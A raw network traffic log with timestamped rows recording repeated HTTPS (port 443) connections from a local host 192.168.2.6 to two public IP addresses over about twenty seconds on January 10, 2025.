Jan 10, 2025 15:45:10.446444988 CET	57061	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:10.446455956 CET	443	57061	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:10.446623087 CET	57061	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:10.446630001 CET	443	57061	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:10.888643980 CET	443	57061	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:10.888704062 CET	443	57061	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:10.888770103 CET	443	57061	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:10.888776064 CET	57061	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:10.888794899 CET	57061	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:10.888848066 CET	57061	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:10.890530109 CET	57061	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:10.890546083 CET	443	57061	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:11.016210079 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:11.016259909 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:11.016365051 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:11.016608000 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:11.016618013 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:11.759459019 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:11.759555101 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:11.762144089 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:11.762203932 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:11.768786907 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:11.768807888 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:11.769074917 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:11.769129038 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:11.769411087 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:11.811333895 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:12.146425962 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:12.146507025 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:12.146534920 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:12.146575928 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:12.146583080 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:12.146614075 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:12.146650076 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:12.146702051 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:12.147521973 CET	57062	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:12.147536993 CET	443	57062	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:12.162656069 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:12.162702084 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:12.162771940 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:12.163125992 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:12.163145065 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:12.840002060 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:12.840112925 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:12.840656042 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:12.840665102 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:12.840840101 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:12.840845108 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:13.293308020 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:13.293431997 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:13.293447971 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:13.293484926 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:13.293500900 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:13.293509007 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:13.293534994 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:13.293576002 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:13.293580055 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:13.293642044 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:13.293700933 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:13.294064045 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:13.294075966 CET	443	57063	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:13.294087887 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:13.294118881 CET	57063	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:13.422576904 CET	57064	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:13.422619104 CET	443	57064	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:13.422710896 CET	57064	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:13.422981024 CET	57064	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:13.422991991 CET	443	57064	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:14.150543928 CET	443	57064	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:14.151503086 CET	57064	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:14.153194904 CET	57064	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:14.153206110 CET	443	57064	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:14.153346062 CET	57064	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:14.153351068 CET	443	57064	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:14.530796051 CET	443	57064	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:14.530864954 CET	57064	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:14.530894041 CET	443	57064	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:14.530944109 CET	57064	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:14.531730890 CET	443	57064	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:14.531775951 CET	443	57064	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:14.531775951 CET	57064	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:14.531817913 CET	57064	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:14.534948111 CET	57064	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:14.534962893 CET	443	57064	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:14.558180094 CET	57065	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:14.558222055 CET	443	57065	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:14.558299065 CET	57065	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:14.558542013 CET	57065	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:14.558556080 CET	443	57065	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:15.261900902 CET	443	57065	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:15.262114048 CET	57065	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:15.262881994 CET	57065	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:15.262892962 CET	443	57065	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:15.263084888 CET	57065	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:15.263089895 CET	443	57065	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:15.709827900 CET	443	57065	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:15.709903002 CET	443	57065	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:15.709970951 CET	443	57065	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:15.710115910 CET	57065	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:15.710115910 CET	57065	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:15.710762024 CET	57065	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:15.710783958 CET	443	57065	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:15.828855038 CET	57066	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:15.828888893 CET	443	57066	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:15.829073906 CET	57066	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:15.829334021 CET	57066	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:15.829344034 CET	443	57066	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:16.470305920 CET	443	57066	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:16.470388889 CET	57066	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:16.475292921 CET	57066	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:16.475332975 CET	443	57066	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:16.475563049 CET	57066	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:16.475575924 CET	443	57066	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:16.863488913 CET	443	57066	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:16.863557100 CET	57066	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:16.863571882 CET	443	57066	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:16.863671064 CET	57066	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:16.863696098 CET	57066	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:16.863780022 CET	443	57066	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:16.863836050 CET	57066	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:16.875602961 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:16.875652075 CET	443	57067	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:16.875715971 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:16.876008987 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:16.876022100 CET	443	57067	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:17.519716978 CET	443	57067	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:17.519799948 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:17.520396948 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:17.520405054 CET	443	57067	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:17.520564079 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:17.520570040 CET	443	57067	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:17.970921993 CET	443	57067	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:17.970963955 CET	443	57067	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:17.970990896 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:17.971023083 CET	443	57067	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:17.971035957 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:17.971064091 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:17.971395016 CET	443	57067	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:17.971443892 CET	443	57067	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:17.971447945 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:17.971488953 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:17.971652985 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:17.971668959 CET	443	57067	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:17.971677065 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:17.971719980 CET	57067	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:18.094757080 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:18.094839096 CET	443	57068	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:18.094996929 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:18.095334053 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:18.095349073 CET	443	57068	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:18.741075993 CET	443	57068	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:18.741235971 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:18.741807938 CET	443	57068	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:18.741873026 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:18.743737936 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:18.743755102 CET	443	57068	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:18.744101048 CET	443	57068	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:18.744159937 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:18.744560957 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:18.787332058 CET	443	57068	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:19.228807926 CET	443	57068	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:19.229094982 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:19.229113102 CET	443	57068	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:19.229166031 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:19.229237080 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:19.229310989 CET	443	57068	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:19.229374886 CET	57068	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:19.246773958 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:19.246814013 CET	443	57069	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:19.246881962 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:19.247140884 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:19.247153044 CET	443	57069	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:19.918817043 CET	443	57069	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:19.918931961 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:19.919466972 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:19.919471979 CET	443	57069	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:19.919662952 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:19.919667959 CET	443	57069	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:20.390769958 CET	443	57069	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:20.390953064 CET	443	57069	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:20.390964031 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:20.390978098 CET	443	57069	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:20.391017914 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:20.391017914 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:20.391047001 CET	443	57069	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:20.391132116 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:20.391166925 CET	443	57069	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:20.391227961 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:20.391515970 CET	57069	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:20.391525984 CET	443	57069	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:20.524398088 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:20.524461031 CET	443	57070	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:20.524635077 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:20.524894953 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:20.524923086 CET	443	57070	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:21.188473940 CET	443	57070	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:21.188563108 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:21.191155910 CET	443	57070	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:21.191226959 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:21.192643881 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:21.192651033 CET	443	57070	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:21.192881107 CET	443	57070	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:21.192934036 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:21.193433046 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:21.235331059 CET	443	57070	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:21.582567930 CET	443	57070	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:21.582634926 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:21.582653046 CET	443	57070	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:21.582720041 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:21.582931995 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:21.583046913 CET	443	57070	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:21.583111048 CET	57070	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:21.583771944 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:21.583803892 CET	443	57071	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:21.583875895 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:21.584086895 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:21.584098101 CET	443	57071	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:22.225838900 CET	443	57071	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:22.225975037 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:22.226525068 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:22.226531982 CET	443	57071	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:22.226690054 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:22.226694107 CET	443	57071	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:22.687516928 CET	443	57071	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:22.687593937 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:22.687608004 CET	443	57071	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:22.687644005 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:22.687697887 CET	443	57071	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:22.687817097 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:22.687839031 CET	443	57071	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:22.687884092 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:22.688013077 CET	443	57071	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:22.688061953 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:22.688208103 CET	57071	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:22.688220024 CET	443	57071	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:22.813066006 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:22.813106060 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:22.813208103 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:22.813455105 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:22.813471079 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:23.481108904 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:23.481185913 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:23.483935118 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:23.483994007 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:23.589085102 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:23.589126110 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:23.590224981 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:23.590296030 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:23.590945005 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:23.631340981 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:23.907596111 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:23.907742977 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:23.907769918 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:23.907902002 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:23.908982038 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:23.909132957 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:23.909143925 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:23.909257889 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:23.954627991 CET	57072	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:23.954649925 CET	443	57072	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:23.968473911 CET	57073	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:23.968585968 CET	443	57073	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:23.968684912 CET	57073	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:23.968936920 CET	57073	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:23.968970060 CET	443	57073	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:24.604729891 CET	443	57073	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:24.604934931 CET	57073	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:24.605477095 CET	57073	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:24.605493069 CET	443	57073	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:24.605648994 CET	57073	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:24.605654955 CET	443	57073	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:25.027102947 CET	443	57073	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:25.027301073 CET	443	57073	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:25.027446032 CET	57073	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:25.027510881 CET	443	57073	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:25.027601957 CET	443	57073	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:25.027656078 CET	57073	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:25.028048992 CET	57073	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:25.028090000 CET	443	57073	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:25.028122902 CET	57073	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:25.028584003 CET	57073	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:25.172936916 CET	57074	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:25.173000097 CET	443	57074	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:25.173101902 CET	57074	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:25.173434019 CET	57074	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:25.173454046 CET	443	57074	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:25.861685991 CET	443	57074	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:25.861778975 CET	57074	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:25.862462997 CET	57074	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:25.862481117 CET	443	57074	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:25.862809896 CET	57074	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:25.862823963 CET	443	57074	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:26.260616064 CET	443	57074	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:26.260776997 CET	57074	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:26.260813951 CET	443	57074	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:26.260960102 CET	57074	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:26.261017084 CET	57074	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:26.261076927 CET	443	57074	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:26.261202097 CET	57074	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:26.284365892 CET	57075	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:26.284475088 CET	443	57075	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:26.284593105 CET	57075	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:26.284962893 CET	57075	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:26.285003901 CET	443	57075	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:26.993635893 CET	443	57075	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:26.993813038 CET	57075	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:26.994247913 CET	57075	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:26.994261980 CET	443	57075	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:26.994422913 CET	57075	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:26.994436979 CET	443	57075	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:27.429604053 CET	443	57075	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:27.429686069 CET	443	57075	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:27.429771900 CET	443	57075	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:27.429831028 CET	57075	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:27.429831028 CET	57075	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:27.429831028 CET	57075	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:27.430536985 CET	57075	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:27.430583000 CET	443	57075	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:27.563412905 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:27.563465118 CET	443	57077	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:27.563539028 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:27.563818932 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:27.563836098 CET	443	57077	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:28.195063114 CET	443	57077	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:28.195338011 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:28.196319103 CET	443	57077	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:28.196393013 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:28.198487997 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:28.198499918 CET	443	57077	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:28.198921919 CET	443	57077	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:28.199023008 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:28.199603081 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:28.243340969 CET	443	57077	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:28.580255985 CET	443	57077	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:28.580379009 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:28.580563068 CET	443	57077	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:28.580614090 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:28.580615044 CET	443	57077	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:28.580614090 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:28.580636024 CET	443	57077	142.250.184.238	192.168.2.6
